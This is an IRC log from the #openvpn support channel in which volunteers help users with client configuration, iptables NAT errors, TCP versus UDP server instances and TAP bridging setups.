clicking the icon but I wanted to make a bash script for it. 
I have already identified the process as being http://pastebin.com/C2pt1dEA where the "AAAAA" you see in tmpAAAAA.conf can be random characters and the "BBBB" in "5BBBB" can be random integers. I wanted to know how I could generalise this com 21:51 < Valcorb> !ipforward 21:51 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 21:51 < Valcorb> !linipforward 21:51 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 21:51 < _DomY-Dom> Valcorb: is this for me ? 21:52 < Valcorb> no sorry 21:52 < Valcorb> for me 21:52 < Valcorb> :P 21:52 < Valcorb> need this info to set up my server 21:52 < _DomY-Dom> k 21:52 < _DomY-Dom> any idea how to help me with making my bash script ? 21:52 < _DomY-Dom> Valcorb: ? 21:53 < Valcorb> hmm 21:53 < Valcorb> nope not really, I'm not really experienced with that :/ 21:53 < Valcorb> sorry 21:53 < _DomY-Dom> Valcorb: So as in, when I kill that process in htop, it disconnects the VPN in viscosity. But I want a command for it to be able to connect 21:53 < Valcorb> hmm, maybe pekster knows 21:54 < Valcorb> but i truly have no idea 21:56 < _DomY-Dom> pekster: http://pastebin.com/raw.php?i=ERpP7vLq 21:58 < pekster> Obviously it's generating the config dynamically 21:58 < pekster> Just write your own config file 21:58 < _DomY-Dom> pekster: Yeah, dunno how it looks like though. Also what about the 5BBBB ? 
21:58 < pekster> Management password 21:58 < _DomY-Dom> pekster: cause I can't actually view the config file. Why does the "management" password change each time ? 21:59 < pekster> Oh, or "management port" I guess. That's not actually a valid port... 21:59 < pekster> See --management in the manpage 21:59 < _DomY-Dom> pekster: so what would the content of the config file have to look like ? ok so I don't need the 5BBBB ? 21:59 < pekster> !howto 21:59 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:59 < pekster> There are very verbose samples online too 22:00 < pekster> The manpage will also tell you more about every option 22:00 < pekster> Maybe there's some way to interact with Viscosity through a command-interface, but I don't have a mac or much experience with it; I've used Tunnelblick, but that was a couple years ago 22:02 < _DomY-Dom> pekster: Yeah, but I'm not sure what this "tmpXXXXX.conf" file is meant to do. Could you indicate to me on the page which one it refers to ? And also the section about what comes after 127.0.0.1 after --management ? Because, honestly, I think after doing that, I've figured it out since whenever this process is listed in htop, if I kill it, it disconnects the VPN. 22:02 < pekster> _DomY-Dom: It's just the config file. Call it my.conf. Or even cute.jpg for all openvpn cares 22:02 < _DomY-Dom> pekster: which means that technically if I can "run it" it connects it 22:02 < pekster> You need to read the howto, because all of this is explained there 22:03 < _DomY-Dom> pekster: yeah but I don't know in the howto which .conf it refers to, there are dozens of .conf for loads of different things 22:03 < pekster> *You* create the config 22:03 < pekster> It's just a text file 22:03 < _DomY-Dom> pekster: which says what though ? 
22:03 < pekster> OpenVPN directives to do what you want 22:04 < pekster> Which is, in fact, explained in the howto 22:04 < _DomY-Dom> pekster: does it have to have any content, or can I just call it tmpXXXXX.conf 22:04 < pekster> Why don't you read the howto and see what it says on that point? 22:04 < _DomY-Dom> pekster: which section, I'm already getting lost in the howto ? 22:05 < pekster> Then perhaps configuring OpenVPN isn't for you. There's an entire section dedicated to the configuration files 22:06 < _DomY-Dom> pekster: http://www.secure-computing.net/openvpn/howto.php#config I guess then.. 22:06 <@vpnHelper> Title: SCN: OpenVPN IRC Channel Policy (at www.secure-computing.net) 22:06 < pekster> !howto 22:06 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 22:07 < pekster> *THAT* howto 22:07 < pekster> Ah, or that mirror, yes 22:08 < pekster> People put a lot of time into creating it. Those of us who volunteer here don't like answering 2-dozen questions that are explained in the official documentation; read it, then read it again, and then ask if you're still confused 22:10 < `nand`> with ‘--cipher none’ do you still need a valid key/certificate to connect? 22:10 < _DomY-Dom> pekster: the thing is, those are for linux & BSD. I'm confused about which .conf file we're referring to exactly 22:11 < Valcorb> pekster: i saw the howto but I still don't get it, I have enabled push "redirect-gateway def1" in my server config file and made sure ipv4 forwarding in sysctl.conf is on, but still i'm not able to use the internet when im connected to the openvpn server 22:13 < _DomY-Dom> pekster: Also, I can't view the current .conf generated by OpenVPN in /Library/ViscosityHelperTools/ActiveConnections/ how come ? If I could I would know what to include in the one I make. 
22:13 < _DomY-Dom> pekster: As in, I can't cat it or find it when I browse to that dir 22:14 < pekster> Valcorb: Where did you get stuck on the flowchart? 22:14 < Valcorb> nowhere, i did everything as they asked 22:14 < Valcorb> oh 22:14 < Valcorb> hmm 22:14 < _DomY-Dom> pekster: have read the wiki -- could you please give me a tip here please though ? 22:15 < Valcorb> iptables gives an error 22:15 < Valcorb> iptables: No chain/target/match by that name. 22:15 < pekster> _DomY-Dom: Find the config file it's generating, or just build your own based on your server's settings 22:16 < pekster> How did you create your server config anyway if you don't have any idea how your system was set up? 22:17 < pekster> Valcorb: Doing what? 22:17 < Valcorb> iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE 22:17 < _DomY-Dom> pekster: That's the point, I can't find the one it's generating because it isn't in the directory it says it is. I didn't make my own server config, it's a VPN I'm using which already has all the certificates etc I'm just trying to figure out how to connect to it through the command line and I can disconnect by killing that process in htop but can't connect due to not knowing what to do for config files etc 22:18 < pekster> Valcorb: You don't have the nat table or MASQUERADE target then. modprobe them (if your kernel has them but didn't autoload it) or build the kernel modules if you didn't put them in. What distro? Or is this a VPS you don't control (in which case you need to have the owner fix it) 22:18 < Valcorb> I do control it 22:18 < Valcorb> its Debian 22:19 < pekster> Oh, then you're missing nat or MASQUERADE support... 22:19 < pekster> somehow 22:19 < pekster> What do you get if you do 'iptables -j MASQUERADE -h' ? 22:20 < Valcorb> lemme pastebin it 22:21 < Valcorb> http://pastebin.com/eWHj90sM 22:21 < pekster> _DomY-Dom: You need to know the server settings if you're connecting to a remote server. 
If it's generic-ish, just use the official sample configs and drop in your keys and remote server details and you're done. But your client settings *must* match the server's for things like encryption and tun/tap settings. See also: 22:21 < pekster> !both 22:21 <@vpnHelper> "both" is If you do not control both ends of the link (server and client) then there is not much we can do to help you. Please talk to your network admin instead. 22:21 < pekster> !provider 22:21 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 22:22 < _DomY-Dom> pekster: Any idea how I can find the config file its generating if it's not in the dir it says it's getting it from (that is --config/Library/ActiveConnections/tmpAAAAAA.conf), the tmpAAAAA.conf isn't there. I know but how do I know the server's settings, I don't get the howto as to how to write this config file. I have the server's ca.crt and ta.key.) 22:22 < pekster> Valcorb: and 'iptables -t nat -nvL' ? 22:22 < Valcorb> http://pastebin.com/PPAnDixt 22:23 < pekster> _DomY-Dom: For the last time, use the sample config file and add in details you need based on the settings you apparently already know 22:24 < _DomY-Dom> pekster: I'm really sorry if I'm slow to understand. Where is the sample.conf ? 22:24 < pekster> hint: the sample config files are in the howto that you obviously didn't read 22:24 < pekster> I'm done helping if you can't be bothered to read the documentation links I send you 22:25 < _DomY-Dom> pekster: this http://openvpn.net/index.php/open-source/documentation/howto.html#client ? 22:25 <@vpnHelper> Title: HOWTO (at openvpn.net) 22:26 < pekster> Valcorb: You sure you didn't miss a spelling on any of that? 
Your kernel has loaded the support for both the nat table and MASQUERADE targets based on those outputs 22:26 < Valcorb> Yeah I double-checked everything 22:26 < Valcorb> its very weird 22:27 < pekster> Oh, the POSTROUTING has an entry too, but it lacks a target... 22:27 < pekster> Did you upgrade the kernel or something recently and forget to reboot? 22:27 < Valcorb> hmm 22:27 < pekster> Could be modules that don't match up with the running kernel 22:27 < Valcorb> lets try to reboot 22:27 < Valcorb> yea 22:27 < Valcorb> ok rebooting 22:28 < _DomY-Dom> pekster: What if I don't have the server.conf because it isn't my VPN server ? 22:29 < Valcorb> okay i rebooted pekster, want me to re-do those commands? 22:29 < pekster> Then you don't get to know what options they used. If they used non-default encryption, for instance, you'd need to match that up to your client config, or any one of a dozen other options that need to match. You might "assume" they're using a pretty vanilla configuration if your GUI crap just worked 22:30 < pekster> I'm not your VPN provider's support team. 
I have zero clue how they're configured to work 22:30 < pekster> Valcorb: Any part of the server-side OS stuff that you didn't make permanent you need to set up again 22:30 < Valcorb> I made everything permanent I believe 22:30 < Valcorb> As I knew it sometimes has to reboot 22:30 < pekster> ie: IP forwarding, NAT, and allowing the traffic through your firewall's filter/FORWARD chain 22:31 < Valcorb> IP forwarding should be permanent 22:31 < Valcorb> !nat 22:31 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 22:31 < _DomY-Dom> pekster: All I've got are .ovpn files, a ca.crt and a ta.key 22:31 < Valcorb> _DomY-Dom: .ovpn is your config file 22:31 < _DomY-Dom> pekster: an .ovpn file * 22:31 < Valcorb> you can find samples in 22:32 < Valcorb> C:/Program Files/OpenVPN/config-samples 22:32 < Valcorb> C:/Program Files/OpenVPN/sample-config 22:32 < Valcorb> * 22:32 < pekster> He's on a mac, but yes, samples are also on the page I linked about 3 times now 22:32 < Valcorb> oh 22:32 < pekster> And you apparently also managed to completely miss the howto on config files. The part that reads "Note that on Linux, BSD, or unix-like OSes, the sample configuration files are named server.conf and client.conf. On Windows they are named server.ovpn and client.ovpn." 22:33 < _DomY-Dom> Well that's easy then.. --config/path/to/file.ovpn in this command http://pastebin.com/raw.php?i=iRJyVgiW rather than /Library/ViscosityHelperTools/ActiveConnections/tmpAAAAA.conf ? 
22:33 < Valcorb> damn, after reboot it still gives the same error 22:33 < _DomY-Dom> pekster: I'm using Mac though, didn't pay attention to the "Windows" section 22:33 < pekster> Valcorb: Can I see 'iptables-save' ? 22:33 < Valcorb> iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE --> no chain/target/match by that name 22:33 < Valcorb> sure 22:33 < _DomY-Dom> Valcorb: check my last question you may know the answer 22:34 < pekster> Hint: Mac is a "Unix-like" system 22:34 < Valcorb> http://pastebin.com/V2z8nCD7 22:34 < _DomY-Dom> pekster: Which is why it makes no sense that the .conf I was talking about is the same as the .ovpn thing I can connect to ! 22:34 < pekster> But your config can be called whatever 22:34 < pekster> I believe I said earlier you can call it cute.jpg if you'd like 22:34 < pekster> That doesn't make it a cute photograph. It's a text file 22:35 < Valcorb> no 22:35 < Valcorb> you have to 22:35 < Valcorb> make sure 22:35 < Valcorb> that 22:35 < Valcorb> your file is called .ovpn at the end 22:35 < Valcorb> or .conf, I don't know about Mac, check the dosx 22:35 < Valcorb> *docs 22:35 < Valcorb> btw, pekster, here it is: http://pastebin.com/V2z8nCD7 22:35 < _DomY-Dom> pekster: no because then it gives me this error http://pastebin.com/raw.php?i=95DY70Qj 22:35 < _DomY-Dom> pekster: when I try and execute the bashscript 22:36 < _DomY-Dom> pekster: actually wait, maybe because I'm still connected to it. Lemme log off and tell you if it makes a difference. brb 22:36 < pekster> Valcorb: weird. What's the output of 'zgrep CONFIG_NF_NAT /proc/config.gz' ? 22:36 -!- _DomY-Dom [~hussainah@94.23.145.51] has quit [Quit: leaving] 22:37 < Valcorb> gzip: /proc/config.gz: No such file or directory 22:37 < Valcorb> lol 22:37 < pekster> Lousy debian... 22:37 < Valcorb> ikr 22:37 < pekster> wtf would you hide the options you built a kernel with? 
:( 22:37 < pekster> Well, the output from iptables suggests they're present, but your error suggests otherwise 22:38 < Valcorb> yeah 22:38 -!- _DomY-Dom [~hussainah@94.23.145.51] has joined #openvpn 22:38 < Valcorb> its weird 22:38 < pekster> how about 'lsmod | grep nat' ? 22:38 < Valcorb> nothing 22:38 < Valcorb> lol 22:39 < pekster> Must be compiled into the kernel then (by process of elimination) 22:39 < Valcorb> hmm 22:39 < pekster> Any SELinux involved? 22:40 < Valcorb> don't think so 22:40 < pekster> And, as root, 'iptables -t nat -A POSTROUTING -s 10.8.0.0 -o eth0 -j MASQUERADE' still throws that error? 22:40 < pekster> Erm, /24 on that -s network 22:41 < Valcorb> yup 22:41 < Valcorb> still same error 22:42 < pekster> Try SNAT instead using your server's IP: 'iptables -t nat -A POSTROUTING -s 10.8.0.0/24 0o eth0 -j SNAT --to-source $ip_of_eth0' 22:42 < Valcorb> Bad argument `0o' 22:42 < Valcorb> just 0, right? :P 22:42 < pekster> -o 22:42 < pekster> (typo) 22:42 < Valcorb> o 22:42 < pekster> -o eth0 22:43 < pekster> We're just changing the target 22:43 < pekster> Not the match 22:43 < Valcorb> iptables v1.4.8: option `--to-source' requires an argument 22:43 < pekster> Right, replace that with your actual IP... 22:43 < `nand`> Can I use a HTTP(S) proxy in UDP mode? 22:43 < Valcorb> oh 22:43 < Valcorb> wow 22:43 < Valcorb> im an idiot 22:43 < Valcorb> lol 22:43 < `nand`> Or would I have to switch to tcp mode for that 22:43 < Valcorb> okay done pekster 22:44 < pekster> `nand`: You mean across the VPN? You can send whatever traffic you want across the VPN tunnel, but you can't connect to an openvpn server as a client through an https proxy because openvpn speaks the openvpn protocol, not https 22:44 < Valcorb> wait, what IP should it be? 10.8.0.0? 
22:44 < pekster> Nope 22:44 < pekster> eth0's IP 22:44 < Valcorb> aha 22:44 < `nand`> pekster: that's incorrect 22:44 < `nand`> pekster: OpenVPN supports HTTP proxies 22:45 < `nand`> see option --http-proxy 22:45 -!- _DomY-Dom [~hussainah@94.23.145.51] has quit [Ping timeout: 240 seconds] 22:45 < pekster> `nand`: Oh, I guess I'm mistaken. Then yea, you'd need tcp for that 22:45 < Valcorb> well i'll check it out tomorrow 22:45 < Valcorb> almost 6 am here 22:45 < `nand`> ah, okay. I need to run two servers to support both TCP and UDP connections, right? 22:45 < pekster> Yup 22:46 < Valcorb> thanks for the help pekster! 22:46 < pekster> With separate network ranges, although you can have the local firewall route between them 22:46 < `nand`> is there some fundamental reason for that or would it be possible to support connecting via both TCP and UDP? 22:46 < pekster> Valcorb: Yea, good luck. There's something screwy with your kernel support. Maybe try 'apt-get update && apt-get dist-upgrade' 22:46 < Valcorb> could try dist-upgrade 22:46 < Valcorb> i did apt-get update a few hours ago 22:47 < pekster> update just updates your list of packages 22:47 < `nand`> I need to connect through a HTTP proxy from one peer, but using TCP instead of UDP imposes a large hit on throughput 22:47 < Valcorb> yea 22:47 < pekster> Not actually upgrades your OS 22:47 < Valcorb> nah 22:47 < Valcorb> dist-upgrade: 22:47 < Valcorb> 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. 22:47 < pekster> `nand`: Right. UDP is preferred, but an http proxy only transports tcp data 22:47 < Valcorb> anyways, good night! 22:48 < pekster> Same problem you have with tor, or an ssh SOCKS proxy, etc 22:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 22:48 < `nand`> pekster: could I set some sort of silly mechanism up to listen on the TCP port and forward all traffic to the UDP port instead? 
22:48 < pekster> Nope 22:49 < pekster> Just run 2 instances and route between them if you want clients to reach one-another on different instances 22:51 < `nand`> Hmm this seems relevant http://www.cs.columbia.edu/~lennox/udptunnel/ 22:51 <@vpnHelper> Title: UDPTunnel 1.1 (at www.cs.columbia.edu) 22:56 < pekster> It won't give you any better performance, and in fact would incur slightly more packet overhead to add yet another layer of encapsulation, plus make the setup more complicated. If you want that badly to connect to a single openvpn instance, sure, check it out, but IMO it's not worth the added complexity 22:57 < pekster> You can basically just copy your UDP config on the server, set it to tcp-server for the protocol, give it a different network range (eg, 10.8.0.0/24 -> 10.8.1.0/24) and you're done 22:58 < `nand`> pekster: I don't care about performance on the machine that needs the HTTP proxy 22:59 < pekster> I just don't see why you're trying so hard to avoid running a 2nd instance 23:02 < pekster> Quite a list of limitations on that udptunnel project too. 
Not sure what you get for all your trouble in the end 23:03 < pekster> Circa 2001 too; hopefully it still builds ;) --- Day changed Wed Feb 13 2013 00:30 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 00:50 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 00:50 -!- mode/#openvpn [+o krzee] by ChanServ 01:03 -!- b1rkh0ff [~b1rkh0ff@178.77.19.125] has quit [Read error: Operation timed out] 01:18 -!- jY [~jy@photoblog.com] has quit [Ping timeout: 276 seconds] 01:20 -!- b1rkh0ff [~b1rkh0ff@178.77.22.0] has joined #openvpn 01:39 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 02:16 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 02:19 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 02:33 -!- knobo [~bohmer@81.175.44.217] has joined #openvpn 02:52 -!- p3rror [~mezgani@2001:0:53aa:64c:2c98:2140:d607:4551] has joined #openvpn 03:08 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:09 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 03:10 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 03:17 -!- zz_AsadH is now known as AsadH 03:24 -!- Saviq_ [~Saviq@178.182.120.58.nat.umts.dynamic.t-mobile.pl] has joined #openvpn 03:24 -!- Saviq_ [~Saviq@178.182.120.58.nat.umts.dynamic.t-mobile.pl] has quit [Read error: Connection reset by peer] 03:33 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:34 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 03:40 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 256 seconds] 03:41 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 03:47 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:52 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 03:55 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Client Quit] 03:59 -!- dazo_afk is now known as dazo 04:26 
-!- kobolduk [~kobolduk@office.prolocation.net] has quit [Ping timeout: 272 seconds] 04:27 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 04:36 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 04:37 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 04:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:58 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 05:02 -!- loompek [~noname@unaffiliated/loompek] has joined #openvpn 05:02 < loompek> mornin, smee again 05:10 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 272 seconds] 05:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 272 seconds] 05:44 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 05:47 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has quit [Quit: leaving] 06:00 < loompek> so i have a specific question regarding tap mode on server... i'd like to bridge different users (clients) with different bridges on one server instance 06:00 < loompek> e.g. user1001 would be bridged to bridge1001, user1002 to bridge1002 etc... 06:01 < loompek> user's tap devices are probably dynamic (tun0 is provided to the first user who connects to the system, tun1 to the second, tun2 to third, etc...) 06:02 < loompek> the bridge devices are already up 06:02 < loompek> and are already bridged to different nics 06:02 < loompek> would it be possible to do this in one server instacne 06:02 < loompek> s/instacne/instance/ 06:03 < loompek> or will i have to set up multiple server instances.. one for every user.. which wouldn't be okay... 06:03 < loompek> as every instance would use different port 06:05 <@dazo> loompek: sounds like an impossible task ... you can't have separate tap devices per user without separate openvpn instances 06:05 <@dazo> loompek: but more importantly ... why do you want to bridge? Just to have access control for each user? 
06:06 < loompek> no, because this server would be a virtual link aggregator
06:06 <@dazo> Not sure if I understand the use case at all
06:06 < loompek> it would be an isp solution
06:07 < loompek> every user has its own vlan
06:07 < loompek> dhcp server is hidden behind edge router
06:07 < pekster> But you already get that with openvpn
06:07 <@dazo> I see
06:08 < pekster> Just don't route between clients and OpenVPN in tun mode effectively puts every client in their own "vlan" so to speak at an L3 level
06:08 < loompek> this system would be connected in front of the edge router and provide remote access to each user
06:08 < loompek> like i said
06:08 <@dazo> well, TAP and bridging most likely isn't the solution here .... that requires separate processes
06:08 < loompek> tun is unacceptable
06:08 < loompek> tap is the only way to go
06:09 < loompek> so.. each and every user should have its own server instance
06:09 <@dazo> because openvpn clients may have broadcast traffic you need to transfer to the customer vlans behind the server?
06:09 < loompek> i don't mind the broadcast traffic
06:09 < loompek> as it would provide l2 to each user...
06:09 < loompek> and everything should work...
06:10 < loompek> from ARP to DHCP traffic
06:10 <@dazo> yeah, that's what I meant ... your service requires transporting L2 traffic across VPN to VLAN
06:10 < loompek> indeed
06:11 <@dazo> As you are in an ISP situation here, tap + bridging are the only solution here .... and to be honest, I'm not sure OpenVPN is the right solution in this setup
06:12 <@dazo> as it won't scale well when you have new customers .... new customer => new VLAN => new OpenVPN server config => bridge VLAN+tap
06:12 <@dazo> however! separate openvpn servers will make the general performance far better than a shared openvpn server ... as each server has only one client to care for
06:13 < havoc> loompek: how many projected customers?
06:13 < pekster> Context switching will still slaughter throughput though
06:13 < havoc> that's a relevant factor
06:14 <@dazo> pekster: actually, context switching (I presume you mean kernel/user-space switches) isn't the biggest trouble with openvpn ... the general efficiency in the tun.ko driver is actually worse
06:15 <@dazo> (the tun.ko driver handles traffic above 1-2Gbps poorly in its current shape)
06:15 < havoc> I thought TUN was better than TAP, performance-wise?
06:15 < havoc> or is that only an issue of L2 v. L3?
06:15 < pekster> Oh, interesting to note. I guess there are multiple bottlenecks in that sense then
06:15 <@dazo> havoc: performance wise, you have a higher overhead with TAP than TUN, due to L2 vs L3
06:15 < havoc> right
06:16 < havoc> but are you also saying that level for level, TAP is better than TUN?
06:16 < havoc> i.e. L3+
06:16 <@dazo> pekster: one hard nut in the tun.ko vs other NICs ... is hardware checksum calculations on TCP packets, which is impossible in a software-only driver
06:16 < pekster> Ah, sure. No TCO possible
06:17 <@dazo> havoc: TUN/L3 gives best performance, due to no ARP broadcasts and such .... TUN/L3 also only transmits traffic destined to that particular client
06:17 <@dazo> havoc: TAP/L2 will always send out broadcast traffic, both on L2 and L3 layer
06:18 < havoc> right, so not an easy/accurate comparison
06:18 <@dazo> havoc: and in addition, you have the Ethernet frames which are transmitted in TAP/L2 ... while TUN/L3 only transports IP packets
06:18 < havoc> right
06:18 < havoc> also, sounds like you came across a situation where bridging is recommended ;)
06:19 <@ecrist> there are certainly situations where bridging is recommended
06:19 <@ecrist> they're rare, though
06:19 < havoc> yeah
06:19 < havoc> I've had a few in the past
06:19 < havoc> been migrating stuff from TAP to TUN too, it's just slooooow :(
06:19 <@dazo> pekster: I know that there are some discussions about making the tun driver multi-threaded as well ... having more tx/rx queues internally as well, so the application can shuffle more data to/from the tun via more "pipes" in the application .... that's the other big bottleneck
06:20 <@dazo> pekster: and the driver to sort out that is KVM/Qemu .... which uses tun.ko for para-virtualised networks
06:20 <@ecrist> the most compelling reason to switch from tap to tun for me is mobile device support
06:20 <@ecrist> there's no tap adapter for iOS/Android
06:21 < havoc> that's a definite perk
06:21 < havoc> does the new android ovpn require root access still?
06:22 <@dazo> havoc: "OpenVPN for Android" and "OpenVPN Connect" use the Android VPN API ... so no rooting needed
06:22 <@dazo> but requires ICS or JB
06:22 < havoc> I don't know what those are
06:22 * havoc googles
06:22 <@ecrist> Android 4
06:22 < havoc> oh, jelly bean
06:23 < havoc> bah, mine's a bit older I think
06:23 < havoc> but still good to know
06:29 < sw0rdfish> hey guys, can my vpn provider restrict me to ONLY use a TAP device on my end?
06:29 <@ecrist> yes
06:30 <@dazo> sw0rdfish: if your VPN provider uses OpenVPN, you can only use whatever the VPN provider offers you .... you need to use the same on both sides
06:37 < loompek> havoc hard to tell... i preconfigured vlans 1001 to 1099 :)
06:38 < havoc> ah
06:38 < loompek> but i guess i'll have to check for a different approach
06:38 < havoc> I'm just wondering why the bridging
06:39 < loompek> because it would be easy to integrate to current core network
06:40 < havoc> still need TAP for the L2 stuff for the customers, but I'd think you could do it w/ TAP and no client-to-client
06:40 < havoc> then do the rest w/ routing on the vpn host
06:40 <@dazo> havoc: you won't be able to route broadcast traffic from the customer dedicated VLANs with that approach
06:41 < havoc> but I understand that the situation is more complicated than what I'm aware of
06:41 < havoc> dazo: ah, so bcast is required?
06:41 <@dazo> or L2 traffic, in general
06:41 <@dazo> this really is one of the very rare cases where tap+bridging is the solution
06:42 < havoc> sounds like it
06:45 < sw0rdfish> dazo woe
06:45 < sw0rdfish> wow*
06:45 < sw0rdfish> ok I see.
06:46 < sw0rdfish> thanks
06:46 < sw0rdfish> well god damn it I need to make iptables work for eth0 -> tap0
06:47 < sw0rdfish> maybe I'm gonna try making a backup of the config file and use rules only for tap0
06:50 < loompek> never mind... i guess i'll deploy routeros on x86 platform.. that openvpn implementation allows me on doing just what i'd like
06:52 < loompek> http://wiki.mikrotik.com/wiki/OpenVPN#OpenVPN_server_Instance
06:52 <@vpnHelper> Title: OpenVPN - MikroTik Wiki (at wiki.mikrotik.com)
06:55 < pekster> No idea what that text is trying to say. None of the code is openvpn or apparent to any OS I'm familiar with. I've used openvpn in both routed and bridged modes on the OpenWRT platform on MIPS before with results one would expect for the platform
07:02 < nirvannah> hello, is there any way to hide my torrent activity when i'm using vpn? because the vpn wont allow me to torrent
07:03 <@ecrist> you mean your vpn service provider?
07:03 < nirvannah> yes
07:03 <@ecrist> not really the right channel
07:03 < nirvannah> thanks but may you lead me to the right channel
07:04 <@ecrist> ask in a torrent channel maybe?
07:04 <@ecrist> we don't really deal with helping people hide traffic
07:05 < nirvannah> sorry but there's no torrent channels in here, maybe you could help me for this one time, wont ask again, please
07:06 <@ecrist> no
07:16 < nirvannah> and also, do you need to disable netbios to use openvpn?
07:20 < pekster> Nope. NBNS may have DNS implications to higher-level protocols, but OpenVPN itself doesn't care
07:23 < nirvannah> i edited the .ovpn from my vpn provider, i changed the protocol udp to tcp, why does it still work?
07:25 < pekster> Clearly they support both
07:25 < pekster> !provider
07:25 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
07:25 < pekster> I have zero clue how $insert_provider does business or operates
10:39 < Holiday> argh I feel like I'm running in circles.. I know I have to be making this harder than it really is (of course with the setup the other guy wants maybe it is as hard as I'm making it out to be)
10:53 < foolove> need help troubleshooting my openvpn connection to my remote vpn service my buddy has the same service and he is using a windows box and his connection works fine i have tried two laptops and my connection will not forward the internet it shows im connected but i can not talk out to the internet
10:54 < foolove> i have tried my setup on two different linux boxes one freshly formatted and i get the same result
10:54 <+EugeneKay> !provider
10:54 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
10:56 < rob0> hehe
10:56 <+EugeneKay> New favorite factoid
10:56 < rob0> it sure was effective
10:58 <@dazo> EugeneKay: Another way is just to say: I'll help you if you show me your server config ;-)
11:00 < pekster> I've been amused at the uptick in people trying to "hide" traffic via a VPN. Wonder how long before these business models collapse when courts catch up and get pen/trace taps for recording honeypot hits
11:00 < pekster> Maybe then we can get less spam here :)
11:01 < Holiday> I'm back and know I'm just missing something simple. I haven't tried the modified TUN setup yet (using manual ifconfig instead of server flag in config due to server IP etc).
11:01 < Holiday> So I have a bridge setup, I vpn in using tap, I can ping the server's REAL IP from the client but not the bridge IP or the other physical interface on the box
11:02 < Holiday> (I also lose all connectivity from the client at all, streaming music stops, can't type in the shell to the vpn server etc)
11:02 < Holiday> I know I have to be missing something simple and stupid
11:07 < pekster> bridges are inherently more complicated to set up, so you shouldn't use them unless you actually need it
11:07 < pekster> !tunortap
11:07 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
11:07 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
11:10 < Holiday> I know (and TUN was recommended here before) but for our setup tap may be better (maybe not). Either way I'm stuck and I've been banging my head off the wall for the last couple days lol
11:11 < Holiday> I also noticed after I kill the vpn on client side the server side spits out code=111.. at least I have something to work with maybe
11:12 < pekster> The bit about the server's "real IP" vs "bridge IP" suggests you don't understand how bridging actually works
11:13 < pekster> It's all part of the same network when you bridge; the bridge serves the same effective function as a network switch
11:14 < Holiday> sorry I had meant the other adapter IP (yeah I got the bridge part :))
11:15 < Holiday> brb
11:16 < pekster> That'll be a firewall problem then if you can't ping your VPN server's IP after connection
